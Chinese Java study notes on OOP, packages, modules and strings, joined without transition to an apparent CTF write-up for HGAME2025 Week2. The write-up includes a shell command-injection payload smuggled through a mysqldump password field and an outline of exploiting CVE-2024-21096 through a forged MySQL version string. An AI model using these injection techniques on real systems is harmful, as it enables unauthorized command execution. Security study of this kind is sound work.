toString()：把instance输出为String；
equals()：判断两个instance是否逻辑相等；
hashCode()：计算一个instance的哈希值。

在必要的情况下，我们可以覆写Object的这几个方法。

#调用super

在子类的覆写方法中，如果要调用父类的被覆写的方法，可以通过super来调用。例如：

class Person {    protected String name;    public String hello() {        return "Hello, " + name;    }}class Student extends Person {    @Override    public String hello() {        // 调用父类的hello()方法:        return super.hello() + "!";    }}

#final

继承可以允许子类覆写父类的方法。如果一个父类不允许子类对它的某个方法进行覆写，可以把该方法标记为final。用final修饰的方法不能被Override：

class Person {    protected String name;    public final String hello() {        return "Hello, " + name;    }}class Student extends Person {    // compile error: 不允许覆写    @Override    public String hello() {    }}

#抽象类

#抽象类与抽象方法

如果一个class定义了方法，但没有具体执行代码，这个方法就是抽象方法，抽象方法用abstract修饰。

因为无法执行抽象方法，因此这个类也必须声明为抽象类（abstract class）。使用abstract修饰的类就是抽象类。我们无法实例化一个抽象类。

因为抽象类本身被设计成只能用于被继承，因此，抽象类可以强迫子类实现其定义的抽象方法，否则编译会报错。因此，抽象方法实际上相当于定义了“规范”。

例如，Person类定义了抽象方法run()，那么，在实现子类Student的时候，就必须覆写run()方法：

// abstract classpublic class Main {    public static void main(String[] args) {        Person p = new Student();        p.run();    }}abstract class Person {    public abstract void run();}class Student extends Person {    @Override    public void run() {        System.out.println("Student.run");    }}

#接口

#interface和implements

在抽象类中，抽象方法本质上是定义接口规范：即规定高层类的接口，从而保证所有子类都有相同的接口实现，这样，多态就能发挥出威力。

如果一个抽象类没有字段，所有方法全部都是抽象方法，就可以把该抽象类改写为接口：interface。在Java中，使用interface可以声明一个接口：

interface Person {    void run();    String getName();}/*等同于：abstract class Person {    public abstract void run();    public abstract String getName();}*/

所谓interface，就是比抽象类还要抽象的纯抽象接口，因为它连字段都不能有。因为接口定义的所有方法默认都是public abstract的，所以不需要写这两个修饰符。

当一个具体的class去实现一个interface时，需要使用implements关键字。例如：

class Student implements Person {    private String name;    public Student(String name) {        this.name = name;    }    @Override    public void run() {        System.out.println(this.name + " run");    }    @Override    public String getName() {        return this.name;    }}

我们知道，在Java中，一个类只能继承自另一个类，不能从多个类继承。但是，一个类可以实现多个interface，例如：

class Student implements Person, Hello { // 实现了两个interface    ...}

#接口继承

一个interface可以继承自另一个interface。interface继承自interface使用extends，它相当于扩展了接口的方法。例如：

interface Hello {    void hello();}interface Person extends Hello {    void run();    String getName();}

此时，Person接口继承自Hello接口，因此，Person接口现在实际上有3个抽象方法签名，其中一个来自继承的Hello接口。

#default方法

在接口中，可以定义default方法。例如，把Person接口的run()方法改为default方法：

// interfacepublic class Main {    public static void main(String[] args) {        Person p = new Student("Xiao Ming");        p.run();    }}interface Person {    String getName();    default void run() {        System.out.println(getName() + " run");    }}class Student implements Person {    private String name;    public Student(String name) {        this.name = name;    }    public String getName() {        return this.name;    }}

实现类可以不必覆写default方法。default方法的目的是，当我们需要给接口新增一个方法时，会涉及到修改全部子类。如果新增的是default方法，那么子类就不必全部修改，只需要在需要覆写的地方去覆写新增方法。

default方法和抽象类的普通方法是有所不同的。因为interface没有字段，default方法无法访问字段，而抽象类的普通方法可以访问实例字段。

#静态字段和静态方法

#静态字段

在一个class中定义的字段，我们称之为实例字段。实例字段的特点是，每个实例都有独立的字段，各个实例的同名字段互不影响。

还有一种字段，是用static修饰的字段，称为静态字段。虽然实例可以访问静态字段，但是它们指向的其实都是Person class的静态字段。所以，所有实例共享一个静态字段。如下例：

// static fieldpublic class Main {    public static void main(String[] args) {        Person ming = new Person("Xiao Ming", 12);        Person hong = new Person("Xiao Hong", 15);        ming.number = 88;        System.out.println(hong.number);        hong.number = 99;        System.out.println(ming.number);    }}class Person {    public String name;    public int age;    public static int number;    public Person(String name, int age) {        this.name = name;        this.age = age;    }}//运行后不能论哪个实例调用number，其值都是99

静态字段并不属于实例。实例对象能访问静态字段只是因为编译器可以根据实例类型自动转换为类名.静态字段来访问静态对象。可以把静态字段理解为描述class本身的字段。

#静态方法

用static修饰的方法称为静态方法。

调用静态方法则不需要实例变量，通过类名就可以调用。静态方法类似其它编程语言的函数。例如：

// static methodpublic class Main {    public static void main(String[] args) {        Person.setNumber(99);        System.out.println(Person.number);    }}class Person {    public static int number;    public static void setNumber(int value) {        number = value;    }}

因为静态方法属于class而不属于实例，因此，静态方法内部，无法访问this变量，也无法访问实例字段，它只能访问静态字段。

通过实例变量也可以调用静态方法，但这只是编译器自动帮我们把实例改写成类名而已。但通常情况下，通过实例变量访问静态字段和静态方法，会得到一个编译警告。

Java程序的入口main()也是静态方法。

#接口的静态字段

因为interface是一个纯抽象类，所以它不能定义实例字段。但是，interface是可以有静态字段的，并且静态字段必须为final类型：

public interface Person {    public static final int MALE = 1;    public static final int FEMALE = 2;}

实际上，因为interface的字段只能是public static final类型，所以我们可以把这些修饰符都去掉，上述代码可以简写为：

public interface Person {    // 编译器会自动加上public static final:    int MALE = 1;    int FEMALE = 2;}

#包

在Java中，我们使用package来解决名字冲突。Java定义了一种名字空间，称之为包(package)。一个类总是属于某个包，类名（比如Person）只是一个简写，真正的完整类名是包名.类名。例如，JDK的Arrays类存放在包java.util下面，因此，完整类名是java.util.Arrays。

在定义class的时候，我们需要在第一行声明这个class属于哪个包。比如小明的Person.java文件：

package ming; // 申明包名mingpublic class Person {}

在Java虚拟机执行的时候，JVM只看完整类名，因此，只要包名不同，类就不同。包可以是多层结构，用.隔开。例如：java.util。

要注意包没有父子关系，java.util和java.util.zip是不同的包，两者没有任何继承关系。

没有定义包名的class，它使用的是默认包，非常容易引起名字冲突，因此，不推荐不写包名的做法。

我们还需要按照包结构把上面的Java文件组织起来。假设以package_sample作为根目录，src作为源码目录，那么所有文件结构如下图，即所有Java文件对应的目录层次要和包的层次一致。

package_sample└─ src    ├─ hong    │  └─ Person.java    │  ming    │  └─ Person.java    └─ mr       └─ jun          └─ Arrays.java

编译后的.class文件也需要按照包结构存放。这样的组织是有必要的，为之后导入其他包打下基础，使导入更加方便清晰。

#包作用域

位于同一个包的类，可以访问包作用域的字段和方法。不用public、protected、private修饰的字段和方法就是包作用域。例如，Person类定义在hello包下面，Main类也定义在hello包下面

package hello;public class Main {    public static void main(String[] args) {        Person p = new Person();        p.hello(); // 可以调用，因为Main和Person在同一个包    }}public class Person {    void hello() {        System.out.println("Hello!");    }}

#import

在一个class中，我们总会引用其他的class。例如，小明的ming.Person类，如果要引用小军的mr.jun.Arrays类，有三种写法：

第一种，直接写出完整类名。然而很多类名写起来很长，这显然不方便。
第二种写法是用import语句，导入小军的Arrays，然后写简单类名：

// Person.javapackage ming;// 导入完整类名:import mr.jun.Arrays;public class Person {    public void run() {        // 写简单类名: Arrays        Arrays arrays = new Arrays();    }}

在写import的时候，可以使用*，表示把这个包下面的所有class都导入进来（*但不包括子包的class*），如下。

// Person.javapackage ming;// 导入mr.jun包的所有class:import mr.jun.*;

但我们一般不推荐这种写法，因为在导入了多个包后，很难看出Arrays类属于哪个包。

还有一种import static的语法，它可以导入一个类的静态字段和静态方法。这个方法很少使用。

package main;// 导入System类的所有静态字段和静态方法:import static java.lang.System.*;

Java编译器最终编译出的.class文件只使用完整类名，因此，在代码中，当编译器遇到一个class名称时：

如果是完整类名，就直接根据完整类名查找这个class；
如果是简单类名，按下面的顺序依次查找：
- 查找当前package是否存在这个class；
- 查找import的包是否包含这个class；
- 查找java.lang包是否包含这个class。

在读反编译出来的代码时，这是个不错的策略。

编写class的时候，编译器会自动帮我们做两个import动作：

默认自动import当前package的其他class；
默认自动import java.lang.*。

注意，如果有两个class名称相同，例如，mr.jun.Arrays和java.util.Arrays，那么只能import其中一个，另一个必须写完整类名。

#编译与运行

假设我们创建了如下的目录结构：

work├── bin└── src    └── com        └── itranswarp            ├── sample            │   └── Main.java            └── world                └── Person.java

其中，bin目录用于存放编译后的class文件，src目录按包结构存放Java源码，我们怎么一次性编译这些Java源码呢？

在linux中，编译src目录下的所有Java文件：

$ javac -d ./bin src/**/*.java

命令行-d指定输出的class文件存放bin目录，后面的参数src/**/*.java表示src目录下的所有.java文件，包括任意深度的子目录。

注意：Windows不支持**这种搜索全部子目录的做法，所以在Windows下编译必须依次列出所有.java文件：
C:\work> javac -d bin src\com\itranswarp\sample\Main.java src\com\itranswarp\world\Persion.java

#作用域

#public

定义为public的class、interface可以被其他任何类访问，前提是首先有访问class的权限(即在同个包作用域内)。

#private

private访问权限被限定在class的内部，而且与方法声明顺序无关。推荐把private方法放到后面，因为public方法定义了类对外提供的功能，阅读代码的时候，应该先关注public方法。

由于Java支持嵌套类，如果一个类内部还定义了嵌套类，那么，嵌套类拥有访问private的权限：

// privatepublic class Main {    public static void main(String[] args) {        Inner i = new Inner();        i.hi();    }    // private方法:    private static void hello() {        System.out.println("private hello!");    }    // 静态内部类:    static class Inner {        public void hi() {            Main.hello();        }    }}

定义在一个class内部的class称为嵌套类（nested class），Java支持好几种嵌套类。

#protected

protected作用于继承关系。定义为protected的字段和方法可以被子类访问，以及子类的子类。

#package

最后，包作用域是指一个类允许访问同一个package的没有public、private修饰的class，以及没有public、protected、private修饰的字段和方法。

#局部变量

在方法内部定义的变量称为局部变量，局部变量作用域从变量声明处开始到对应的块结束。方法参数也是局部变量。

package abc;public class Hello {    void hi(String name) { // 1        String s = name.toLowerCase(); // 2        int len = s.length(); // 3        if (len < 10) { // 4            int p = 10 - len; // 5            for (int i=0; i<10; i++) { // 6                System.out.println(); // 7            } // 8        } // 9    } // 10}

根据以上代码，可知：

方法参数name是局部变量，它的作用域是整个方法，即1 ~ 10；
变量s的作用域是定义处到方法结束，即2 ~ 10；
变量len的作用域是定义处到方法结束，即3 ~ 10；
变量p的作用域是定义处到if块结束，即5 ~ 9；
变量i的作用域是for循环，即6 ~ 8。

使用局部变量时，应该尽可能把局部变量的作用域缩小，尽可能延后声明局部变量。

#final

final与访问权限不冲突，它有很多作用。

用final修饰class可以阻止被继承
用final修饰method可以阻止被子类覆写
用final修饰field(字段)可以阻止被重新赋值
用final修饰局部变量可以阻止被重新赋值

#注意事项

一个.java文件只能包含一个public类，但可以包含多个非public类。如果有public类，文件名必须和public类的名字相同。

#内部类

在Java程序中，通常情况下，我们把不同的类组织在不同的包下面，对于一个包下面的类来说，它们是在同一层次，没有父子关系：

java.lang├── Math├── Runnable├── String└── ...

还有一种类，它被定义在另一个类的内部，所以称为内部类（Nested Class）。Java的内部类分为好几种。

#Inner Class

如果一个类定义在另一个类的内部，这个类就是Inner Class：

class Outer {    class Inner {        // 定义了一个Inner Class    }}

上述定义的Outer是一个普通类，而Inner是一个Inner Class，它与普通类最大的不同就是Inner Class的实例不能单独存在，必须依附于一个Outer Class的实例：

// inner classpublic class Main {    public static void main(String[] args) {        Outer outer = new Outer("Nested"); // 实例化一个Outer        Outer.Inner inner = outer.new Inner(); // 实例化一个Inner        inner.hello();    }}class Outer {    private String name;    Outer(String name) {        this.name = name;    }    class Inner {        void hello() {            System.out.println("Hello, " + Outer.this.name);        }    }}

观察上述代码，要实例化一个Inner，我们必须首先创建一个Outer的实例，然后，调用Outer实例的new来创建Inner实例：

Outer.Inner inner = outer.new Inner();

这是因为Inner Class除了有一个this指向它自己，还隐含地持有一个Outer Class实例，可以用Outer.this访问这个实例。所以，实例化一个Inner Class不能脱离Outer实例。

Inner Class和普通Class相比，除了能引用Outer实例外，还可以修改Outer Class的private字段，因为Inner Class的作用域在Outer Class内部，所以能访问Outer Class的private字段和方法。

观察Java编译器编译后的.class文件可以发现，Outer类被编译为Outer.class，而Inner类被编译为Outer$Inner.class。

#Anonymous Class

还有一种定义Inner Class的方法，它不需要在Outer Class中明确地定义这个Class，而是在方法内部，通过匿名类（Anonymous Class）来定义。示例代码如下：

// Anonymous Classpublic class Main {    public static void main(String[] args) {        Outer outer = new Outer("Nested");        outer.asyncHello();    }}class Outer {    private String name;    Outer(String name) {        this.name = name;    }    void asyncHello() {        Runnable r = new Runnable() {            @Override            public void run() {                System.out.println("Hello, " + Outer.this.name);            }        };        new Thread(r).start();    }}

匿名类使我们能够在代码中创建一次性的类实例，通常用于实现接口或继承类，而不需要显式定义类。匿名类常用于需要短期实现某个接口、或者处理简单逻辑的场景，这样可以避免为了使用某个接口功能而频繁创建新类。

#Static Nested Class

最后一种内部类和Inner Class类似，但是使用static修饰，称为静态内部类（Static Nested Class）：

// Static Nested Classpublic class Main {    public static void main(String[] args) {        Outer.StaticNested sn = new Outer.StaticNested();        sn.hello();    }}class Outer {    private static String NAME = "OUTER";    private String name;    Outer(String name) {        this.name = name;    }    static class StaticNested {        void hello() {            System.out.println("Hello, " + Outer.NAME);        }    }}

用static修饰的内部类和Inner Class有很大的不同，它不再依附于Outer的实例，而是一个完全独立的类，因此无法引用Outer.this，但它可以访问Outer的private静态字段和静态方法。

#classpath和jar

#classpath

classpath是JVM用到的一个环境变量，它用来指示JVM如何搜索class。

因为Java是编译型语言，源码文件是.java，而编译后的.class文件才是真正可以被JVM执行的字节码。因此，JVM需要知道，如果要加载一个abc.xyz.Hello的类，应该去哪搜索对应的Hello.class文件。

所以，classpath就是一组目录的集合，它设置的搜索路径与操作系统相关。例如，在Windows系统上，用;分隔，带空格的目录用""括起来，可能长这样：

C:\work\project1\bin;C:\shared;"D:\My Documents\project1\bin"

在Linux系统上，用:分隔，可能长这样：

/usr/shared:/usr/local/bin:/home/liaoxuefeng/bin

现在我们假设classpath是.;C:\work\project1\bin;C:\shared，当JVM在加载abc.xyz.Hello这个类时，会依次查找：

.\abc\xyz\Hello.class
C:\work\project1\bin\abc\xyz\Hello.class
C:\shared\abc\xyz\Hello.class

classpath的设定方法有两种：

在系统环境变量中设置classpath环境变量，不推荐；
在启动JVM时设置classpath变量，推荐。

在系统环境变量中设置classpath会污染整个系统环境。在启动JVM时设置classpath才是推荐的做法。实际上就是给java命令传入-classpath(-cp)参数。

java -cp .;C:\work\project1\bin;C:\shared abc.xyz.Hello

没有设置系统环境变量，也没有传入-cp参数，那么JVM默认的classpath为.(当前目录)。

在java5中，sun公司改进了JDK设计，JRE会自动搜索当前路径下的jar包，并自动加载dt.jar和tools.jar。所以从Java5开始，就不必再设置CLASSPATH环境变量了。
来自「JAVA」 Java基础之CLASSPATH环境变量

#jar包

如果有很多.class文件，散落在各层目录中，肯定不便于管理。如果能把目录打一个包，变成一个文件，就方便多了。

jar包就是用来干这个事的，它可以把package组织的目录层级，以及各个目录下的所有文件（包括.class文件和其他文件）都打成一个jar文件，这样一来，无论是备份，还是发给客户，就简单多了。

jar包实际上就是一个zip格式的压缩文件，而jar包相当于目录。如果我们要执行一个jar包的class，就可以把jar包放到classpath中：

java -cp ./hello.jar abc.xyz.Hello

这样JVM会自动在hello.jar文件里去搜索某个类。

创建jar包的方式很简单，将目录压缩成zip，再把后缀改成jar就好了。要注意里面的目录结构和之后运行时保持配对。

也可以使用jar命令行方法打包，下面是jar命令行的使用方法：

jar {c t x u f }[ v m e 0 M i ][-C 目录] 文件名 …
-c 创建一个jar包
-t 显示jar中的内容列表
-x 解压jar包
-u 添加文件到jar包中
-f 指定jar包的文件名
-v 生成详细的报造，并输出至标准设备
-m 指定MANIFEST.MF文件
-o 产生jar包时不对其中的内容进行压缩处理
-M 不产生MANIFEST.MF。这个参数相当于忽略掉-m参数的设置
-i 为指定的jar文件创建索引文件
-C 表示转到相应的目录下执行jar命令,相当于cd到那个目录，然后不带-C执行jar命令
摘录自 jar命令的用法详解

jar包还可以包含一个特殊的/META-INF/MANIFEST.MF文件，MANIFEST.MF是纯文本，可以指定Main-Class和其它信息。JVM会自动读取这个MANIFEST.MF文件，如果存在Main-Class，我们就不必在命令行指定启动的类名，而是用更方便的命令：

java -jar hello.jar

在大型项目中，不可能手动编写MANIFEST.MF文件，再手动创建jar包。Java社区提供了大量的开源构建工具，例如Maven，可以非常方便地创建jar包。

#模块

#什么是模块

从Java 9开始，JDK又引入了模块（Module）。主要是为了解决“依赖”这个问题。如果a.jar必须依赖另一个b.jar才能运行，那我们应该给a.jar加点说明啥的，让程序在编译和运行的时候能自动定位到b.jar，这种自带“依赖关系”的class容器就是模块。

从Java 9开始，原有的Java标准库已经由一个单一巨大的rt.jar分拆成了几十个模块，这些模块以.jmod扩展名标识，可以在$JAVA_HOME/jmods目录下找到它们：

java.base.jmod
java.compiler.jmod
java.datatransfer.jmod
java.desktop.jmod
…

这些.jmod文件每一个都是一个模块，模块名就是文件名。模块之间的依赖关系已经被写入到模块内的module-info.class文件了。所有的模块都直接或间接地依赖java.base模块，只有java.base模块不依赖任何模块，它可以被看作是“根模块”。

把一堆class封装为jar仅仅是一个打包的过程，而把一堆class封装为模块则不但需要打包，还需要写入依赖关系，并且还可以包含二进制代码（通常是JNI扩展）。此外，模块支持多版本，即在同一个模块中可以为不同的JVM提供不同的版本。

#编写模块

首先，创建模块和原有的创建Java项目是完全一样的，以oop-module工程为例，它的目录结构如下：

oop-module├── bin├── build.sh└── src    ├── com    │   └── itranswarp    │       └── sample    │           ├── Greeting.java    │           └── Main.java    └── module-info.java

其中，bin目录存放编译后的class文件，src目录存放源码，按包名的目录结构存放，仅仅在src目录下多了一个module-info.java这个文件，这就是模块的描述文件。在这个模块中，它长这样：

module hello.world {    requires java.base; // 可不写，任何模块都会自动引入java.base    requires java.xml;}

其中，module是关键字，后面的hello.world是模块的名称，它的命名规范与包一致。花括号的requires xxx;表示这个模块需要引用的其他模块名。除了java.base可以被自动引入外，这里我们引入了一个java.xml的模块。

当我们使用模块声明了依赖关系后，才能使用引入的模块。例如，Main.java代码如下：

package com.itranswarp.sample;// 必须引入java.xml模块后才能使用其中的类:import javax.xml.XMLConstants;public class Main {    public static void main(String[] args) {        Greeting g = new Greeting();        System.out.println(g.hello(XMLConstants.XML_NS_PREFIX));    }}

接下来我们用JDK提供的命令行工具来编译并创建模块。

首先，我们把工作目录切换到oop-module，在当前目录下编译所有的.java文件，并存放到bin目录下，命令如下：

$ javac -d bin src/module-info.java src/com/itranswarp/sample/*.java

如果编译成功，现在项目结构如下：

oop-module├── bin│   ├── com│   │   └── itranswarp│   │       └── sample│   │           ├── Greeting.class│   │           └── Main.class│   └── module-info.class└── src    ├── com    │   └── itranswarp    │       └── sample    │           ├── Greeting.java    │           └── Main.java    └── module-info.java

注意到src目录下的module-info.java被编译到bin目录下的module-info.class。

下一步，我们需要把bin目录下的所有class文件先打包成jar，在打包的时候，注意传入--main-class参数，让这个jar包能自己定位main方法所在的类：

$ jar -cf hello.jar --main-class com.itranswarp.sample.Main -C bin .

--main-class 指定main类
-C bin . 表示将 bin 目录下的所有文件和子目录都包含在 JAR 文件中。

现在我们就在当前目录下得到了hello.jar这个jar包，可以直接使用命令java -jar hello.jar来运行它。但是我们的目标是创建模块，所以，继续使用JDK自带的jmod命令把一个jar包转换成模块：

$ jmod create -cp hello.jar hello.jmod

于是，在当前目录下我们又得到了hello.jmod这个模块文件。

#运行模块

要运行一个jar，我们使用java -jar命令。要运行一个模块，我们只需要指定模块名。

$ java --module-path hello.jar --module hello.worldHello, xml!

注意指定module-path时要指定的是jar位置而非jmod。生成的jmod主要是用来打包jre的

#打包JRE

前面讲了，为了支持模块化，Java 9首先带头把自己的一个巨大无比的rt.jar拆成了几十个.jmod模块，原因就是，运行Java程序的时候，实际上我们用到的JDK模块，并没有那么多。不需要的模块，完全可以删除。过去发布一个Java应用程序，要运行它，必须下载一个完整的JRE，再运行jar包。非常麻烦，并且JRE占用存储不小。

现在，JRE自身的标准库已经分拆成了模块，只需要带上程序用到的模块，其他的模块就可以被裁剪掉。怎么裁剪JRE呢？并不是说把系统安装的JRE给删掉部分模块，而是“复制”一部分JRE，只带上用到的模块。为此，JDK提供了jlink命令来干这件事。命令如下：

$ jlink --module-path hello.jmod --add-modules java.base,java.xml,hello.world --output jre/

我们在--module-path参数指定了我们自己的模块hello.jmod，然后，在--add-modules参数中指定了我们用到的3个模块java.base、java.xml和hello.world，用,分隔。最后，在--output参数指定输出目录。

现在，在当前目录下，我们可以找到jre目录，这是一个完整的并且带有我们自己hello.jmod模块的JRE。试试直接运行这个JRE：

$ jre/bin/java --module hello.worldHello, xml!//相当于这是个新的JRE，可以在其他未部署java的环境下运行！

要分发我们自己的Java应用程序，只需要把这个jre目录打个包给对方发过去，对方直接运行上述命令即可，既不用下载安装JDK，也不用知道如何配置我们自己的模块，极大地方便了分发和部署。

#访问权限

class的访问权限(public等)只在一个模块内有效，模块和模块之间，例如，a模块要访问b模块的某个class，必要条件是b模块明确地导出了可以访问的包。

举个例子：我们编写的模块hello.world用到了模块java.xml的一个类javax.xml.XMLConstants，我们之所以能直接使用这个类，是因为模块java.xml的module-info.java中声明了若干导出：

module java.xml {    exports java.xml;    exports javax.xml.catalog;    exports javax.xml.datatype;    ...}

只有它声明的导出的包，外部代码才被允许访问。换句话说，如果外部代码想要访问我们的hello.world模块中的com.itranswarp.sample.Greeting类，我们必须将其导出：

module hello.world {    exports com.itranswarp.sample;    requires java.base;    requires java.xml;}

因此，模块进一步隔离了代码的访问权限。

#Java核心类

#字符串和编码

#String

在Java中，String是一个引用类型，它本身也是一个class。但是，Java编译器对String有特殊处理，即可以直接用"..."来表示一个字符串：

String s1 = "Hello!";

实际上字符串在String内部是通过一个char[]数组表示的，因此，按下面的写法也是可以的：

String s2 = new String(new char[] {'H', 'e', 'l', 'l', 'o', '!'});

Java字符串的一个重要特点就是字符串不可变。这种不可变性是通过内部的private final char[]字段，以及没有任何修改char[]的方法实现的。

#字符串比较

当我们想要比较两个字符串是否相同时，要特别注意，我们实际上是想比较字符串的内容是否相同。必须使用equals()方法而不能用==。

如下例：

// Stringpublic class Main {    public static void main(String[] args) {        String s1 = "hello";        String s2 = "hello";        System.out.println(s1 == s2);        System.out.println(s1.equals(s2));    }}

从表面上看，两个字符串用==和equals()比较都为true，但实际上那只是Java编译器在编译期，会自动把所有相同的字符串当作一个对象放入常量池，自然s1和s2的引用就是相同的。

所以，这种==比较返回true纯属巧合。换一种写法，==比较就会失败：

// Stringpublic class Main {    public static void main(String[] args) {        String s1 = "hello";        String s2 = "HELLO".toLowerCase();        System.out.println(s1 == s2);        System.out.println(s1.equals(s2));    }}

两个字符串比较，必须总是使用equals()方法。

要忽略大小写比较，使用equalsIgnoreCase()方法。

String类还提供了多种方法来操作字符串。

判断字串：

string.contains("ll"); // 判断字符串中是否存在指定字符串

注意到contains()方法的参数是CharSequence而不是String，CharSequence是String实现的一个接口。

搜索子串的方法：

string.indexOf("l"); // 查找首个指定字符的索引string.lastIndexOf("l"); // 查找末个指定字符的索引string.startsWith("He"); // 判断是否以某字符串开头string.endsWith("lo"); // 判断是否以某字符串结尾

提取子串：

string.substring(2, 4); //截取索引范围内的字符

去除空白字符：

string.trim(); //去除字符串首尾空白字符,包括\t,\r,\nstring.strip(); // 去除字符串首尾空白字符,包括\t,\r,\n,\u3000string.stripLeading(); // 去除字符串首空白字符string.stripTrailing(); // 去除字符串尾空白字符

判断空字符或空白字符：

string.isEmpty(); // 判断字符串长度是否为0string.isBlank(); // 判断是否只包含空白字符

替换字串：

string.replace(str1, str2); // 将字符串中指定字串(str1)替换为另指定字符(str2)string.replaceAll(re_str, str); // 根据正则表达式替换字符

分割字符：

string.split(re_str); // 根据正则表达式分割字符串为数组

拼接字符串：

String.join(str, arr); // 以指定字符串(str)连接字符串数组(arr)中所有字符串// 该方法为静态方法

格式化字符串

String.format("Hi %s, your score is %.2f!", "Bob", 59.5)// 格式化字符串，占位符与C中无异// 该方法为静态方法

类型转换

String.valueOf(arg1); // 将arg1转换为字符串类，该方法为静态方法Integer.parseInt(str, arg2); // 将str以arg2的进制转换为十进制int

要特别注意，Integer有个getInteger(String)方法，它不是将字符串转换为int，而是把该字符串对应的系统变量转换为Integer：

Integer.getInteger("java.version"); // 版本号int

不记录StringJoiner和StringBuilder

#包装类型

我们已经知道，Java的数据类型分两种：

基本类型：byte，short，int，long，boolean，float，double，char；
引用类型：所有class和interface类型。

引用类型可以赋值为null，表示空，但基本类型不能赋值为null

那么，如何把一个基本类型视为对象（引用类型）？比如，想要把int基本类型变成一个引用类型，我们可以定义一个Integer类，它只包含一个实例字段int，这样，Integer类就可以视为int的包装类（Wrapper Class）：

public class Main {    public static void main(String[] args) {        Integer n = null;        Integer n2 = new Integer(99);        int n3 = n2.intValue();    }}class Integer { // 定义int的包装类型integer    private int value;    public Integer(int value) {        this.value = value;    }    public int intValue() {        return this.value;    }}

实际上，因为包装类型非常有用，Java核心库为每种基本类型都提供了对应的包装类型：

基本类型	对应的引用类型
boolean	java.lang.Boolean
byte	java.lang.Byte
short	java.lang.Short
int	java.lang.Integer
long	java.lang.Long
float	java.lang.Float
double	java.lang.Double
char	java.lang.Character

#Auto Boxing

因为int和Integer可以互相转换，所以，Java编译器可以帮助我们自动在int和Integer之间转型：

Integer n = 100; // 编译器自动使用Integer.valueOf(int)int x = n; // 编译器自动使用Integer.intValue()

这种直接把int变为Integer的赋值写法，称为自动装箱（Auto Boxing），反过来，把Integer变为int的赋值写法，称为自动拆箱（Auto Unboxing）。

自动装箱和自动拆箱只发生在编译阶段，目的是为了少写代码。

装箱和拆箱会影响代码的执行效率，因为编译后的class代码是严格区分基本类型和引用类型的。并且，自动拆箱执行时可能会报NullPointerException(基本类型被赋为引用类型时)。

#不变类

所有的包装类型都是不变类。我们查看Integer的源码可知，它的核心代码如下。因此，一旦创建了Integer对象，该对象就是不变的。

public final class Integer {    private final int value;}

由于包装类型是引用类型，比较时要用equals()函数。

我们把能创建“新”对象的静态方法称为静态工厂方法。Integer.valueOf()就是静态工厂方法，它尽可能地返回缓存的实例以节省内存。因此创建新对象时，优先选用静态工厂方法而不是new操作符。

#JavaBean

在Java中，有很多class的定义都符合这样的规范：

若干private实例字段；
通过public方法来读写实例字段。
存在get…与set…的读写方法(boolean字段比较特殊，它的读方法一般命名为isXyz())

那么这种class被称为JavaBean，它是一种JAVA语言写成的可重用组件。，例如：

public class Person {    private String name;    private int age;    public String getName() { return this.name; }    public void setName(String name) { this.name = name; }    public int getAge() { return this.age; }    public void setAge(int age) { this.age = age; }}

我们通常把一组对应的读方法（getter）和写方法（setter）称为属性（property）。例如，name属性：

对应的读方法是String getName()
对应的写方法是setName(String)

只有getter的属性称为只读属性（read-only），例如，定义一个age只读属性：

对应的读方法是int getAge()
无对应的写方法setAge(int)

类似的，只有setter的属性称为只写属性（write-only）。

#JavaBean的作用

JavaBean主要用来传递数据，即把一组数据组合成一个JavaBean便于传输。

另外还有事件类JavaBean，这里就不摘录了

WP FOR HGAME2025 Week2

2025-02-18T10:03:29.000Z

#Web

#Level 21096 HoneyPot

原本应该是CVE-2024-21096的复现，然而源码中直接存在漏洞，可以直接rce。

部分源码：

//Never able to inject shell commands,Hackers can't use this,HaHa    command := fmt.Sprintf("/usr/local/bin/mysqldump -h %s -u %s -p%s %s |/usr/local/bin/mysql -h 127.0.0.1 -u %s -p%s %s",        config.RemoteHost,         config.RemoteUsername,        config.RemotePassword,        config.RemoteDatabase,        localConfig.Username,        localConfig.Password,        config.LocalDatabase,

func validateImportConfig(config ImportConfig) error {    if config.RemoteHost == "" ||        config.RemoteUsername == "" ||        config.RemoteDatabase == "" ||        config.LocalDatabase == "" {        return fmt.Errorf("missing required fields")    }    if match, _ := regexp.MatchString(`^[a-zA-Z0-9\.\-]+$`, config.RemoteHost); !match {        return fmt.Errorf("invalid remote host")    }    if match, _ := regexp.MatchString(`^[a-zA-Z0-9_]+$`, config.RemoteUsername); !match {        return fmt.Errorf("invalid remote username")    }    if match, _ := regexp.MatchString(`^[a-zA-Z0-9_]+$`, config.RemoteDatabase); !match {        return fmt.Errorf("invalid remote database name")    }    if match, _ := regexp.MatchString(`^[a-zA-Z0-9_]+$`, config.LocalDatabase); !match {        return fmt.Errorf("invalid local database name")    }    return nil}

由于没有对config.RemotePassword进行任何过滤，这里可以直接写rce代码：

fumofumo ; /writeflag; #

再访问/flag就可以得到flag了。

#Level 21096 HoneyPot_Revenge

真正的CVE-2024-21096的复现题。

首先要下载mysql8.0.34,由于要修改其版本号来实现注入，必须要下载源码后编译安装。

编译安装完成后，修改mysql_version.h.in版本模板文件如下，执行/writeflag。因为mysqldump连接数据库后对导出的文件没有对MySQL的版本号做校验，导致可以注入CRLF行并插入\!来执行命令。

之后编译安装，初始化启动建库之后要整一个可以被连接的用户，这里设定admin：

CREATE USER 'admin'@'%' IDENTIFIED BY 'admin';GRANT ALL PRIVILEGES ON *.* TO 'admin'@'%';FLUSH PRIVILEGES;

查看mysql版本：

/usr/local/mysql/bin/mysqldump --version

之后上靶机连接本地数据库,访问/flag目录即可

由于本人过于愚蠢写write写成wirte导致第一次重来（编译很麻烦），之后又因为服务没重启（弱智的我）劳烦学长，真的太感谢了！

鸣谢： CVE-2024-21096 mysqldump命令注入漏洞简析——Ec3o

#Misc

#Computer cleaner plus

进虚拟机后一顿寻找，在先探var，没有发现什么脏东西。再探root目录，ls -la会发现存在 .hide_command目录，里面存在ps，典型的替换ps命令留后门。

那么必然存在一个伪造的ps，find / -name *ps*就可以发现在/usr/bin/ps。读取它的内容，就得到了flag。

#Invest in hints

（为了好分辨，将给出的二进制称为Hint，待购的称之为hint）

核心猜测：Hint中的每个1都代表hint中对应的字符，更好的解释：

对于目标Hint的二进制串，提取所有1的位置（从右到左索引）。
例如，若Hint51的二进制串为：
0000110010100111101000000001001000111010000000000000000000110111100010
其1的位置表示明文字符在原串中的位置。
（自deepseek）

这可以解释为什么每个Hint长度相同而hint长度不定，同样也可以解释题目给出信息：每个 Hint 按原串顺序包含以下位（个位代表原串的第一个字符）。即应当倒置Hint再一一对应将hint中的数字填入。

接着解决Hint与hint的对应问题。通过购买几个hint并将明文填入，不难猜测应该就是Hint51->hint1,Hint52->hint2的形式

